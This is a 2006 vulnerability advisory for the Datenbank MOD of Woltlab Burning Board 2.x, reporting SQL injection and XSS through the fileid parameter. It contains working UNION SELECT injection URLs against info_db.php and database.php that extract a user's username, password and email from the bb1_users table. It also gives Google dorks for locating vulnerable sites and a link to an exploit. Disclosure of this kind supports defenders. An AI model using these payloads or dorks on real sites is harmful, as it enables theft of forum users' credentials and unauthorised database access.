Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple Vulnerabilities.

–Security Report–
Advisory: Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple
Vulnerabilities.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 01/03/06 01:33 AM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: WbbCoderForum (http://www.wbbcoderforum.de)
Version: Datenbank MOD 2.7 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
fileid parameter in this mod if
magic_quotes_gpc = on, if magic_quotes_gpc off remote attacker can make
malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Critical
MOD Pages: info_db.php , database.php

How&Example:
GPC
GET ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1//[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1//UNION//SELECT//0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0//FROM//bb1_users//where//userid=1
GET ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1//[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1//UNION//SELECT//0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0//FROM//bb1_users//where//userid=1
with this examples remote attacker can leak speficied users login information
from database.

Timeline:

• 01/03/2006: Vulnerability found.
• 01/03/2006: Contacted with vendor and waiting reply.

Exploit:
http://www.nukedx.com/?getxpl=17

Dorks: inurl:info_db.php , inurl:/wbb2/info_db.php , inurl:/board/info_db.php,
inurl:database.php , inurl:/wbb2/database.php , inurl:/board/database.php
allintext:Datenbank Trooper WbbCoderForum.de etc. etc.

Original advisory: http://www.nukedx.com/?viewdoc=17